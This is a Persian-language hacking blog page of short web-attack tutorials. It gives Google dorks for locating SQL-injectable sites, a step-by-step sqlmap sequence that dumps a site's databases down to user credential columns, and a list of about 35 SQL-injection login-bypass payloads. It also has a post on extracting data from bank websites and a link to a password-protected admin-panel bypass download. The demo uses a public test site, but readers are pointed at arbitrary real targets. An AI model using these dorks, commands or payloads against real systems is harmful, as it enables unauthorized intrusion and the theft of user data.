Penetration test web :: Cyber Security

:: آموزش امنیت سایبری و پیشگیری از جرایم سایبری ::

هک یک هنر است برای سازندگی نه برای تخریب!

اصطلاحات وب هکینگ

توضیحات اصطلاحاتی که هکر ها در وب هکینگ از آنه‍ا استفاده میکنند...

ادامه مطلب...
۰ نظر

آموزش دامپ دیتابیس سایت ها

آموزش دامپ دیتابیس سایت ها با باگ Sql Injection با کمک ابذار Sqlmap


در قدم اول یک سایت که دارایی باگ sql داره را پیدا کنید(میتوانید از دورک های زیر استفاده کنید)

inurl:news.php?id=
inurl:pages.php?id=
inurl:post.php?id=
inurl:events.php?id=
inurl:details.php?id=
inurl:blog.php?id=
inurl:show.php?id=

تارگتی که بنده در این آموزش استفاده میکنم 
http://testphp.vulnweb.com/listproducts.php?cat=1'

 (سپس یک ترمینال را بازکنید(با دستور زیر دیتابیس سایت را بیرون بکشید

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 —dbs

 سپس دیتابیس های سایت رو به ما در اخر نشون میده بعدش با دستور زیر جدول های دیتادیس مورد نظر خودمونو بدست میاریم

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D نام دیتابیس —tables

مثلا ما فرض رو به این میگیریم یه تیبل به ما نشون میده و اسمش هم یوزر هستش با دستور زیر ستون های دیتابیس رو بدست میاریم

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D dbname -T users —columns

فرض میکنیم که سه تا ستون زیر رو نشون میده

username
password
email

در نهایت با دستور زیر دیتای ستون هارو بدست میاریم
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D dbname -T users -C username password email —dump

دیتابیس شما با موفقیت دامپ شد


ومن الله توفیق


منبع: Hijack.blog.ir

۰ نظر

کارکترهایی برای شناسایی باگ ها

در تصویر زیر کارکترهای که برای شناسایی باگ ها استفاده می شود همراه با توضیح قرار گرفته است


منبع: Hijack.blog.ir

۰ نظر

Bypass صفحه Login

مجموعه دستوراتی که برای تزریق به صفحات لاگین در باگ sql استفاده میشود شامل موارد زیر میشود.

or'1'='1'or'1'='1'
'or'1'='1'or'1'='1
' or ' '='
' or ''='
admin'or''='
admin" or "a"="
admin" or 1=1 --
admin' or 1=1 --
admin' or 'a'='a
admin') or ('a'='a
admin") or ("a"="a
a=1)--
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a 
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
که نفوذگر با قرار دادن این دستورات در صفحات لاگین یک وب سایت بدون داشتن یوزر و پسورد اقدام به Bypass به پنل مدیریتی یا کاربری میکند.

منبع: Hijack.blog.ir
۱ نظر

استخراج اطلاعات وبسایت بانک ها


به تصویر بالا و نوار آدرس دقت کنید نفوذگر با ارسال دستورات از همین قسمت اطلاعات وب سایت بانک را استخراج میکند.

۱ نظر

آموزش bypass پنل ادمین

آموزش bypass پنل ادمین با افزونه No Redirect (روش جدید)


جهت دریافت آموزش کلیک کنید
حجم: 8.78 مگابایت

پسورد: hijack.blog.ir


۱ نظر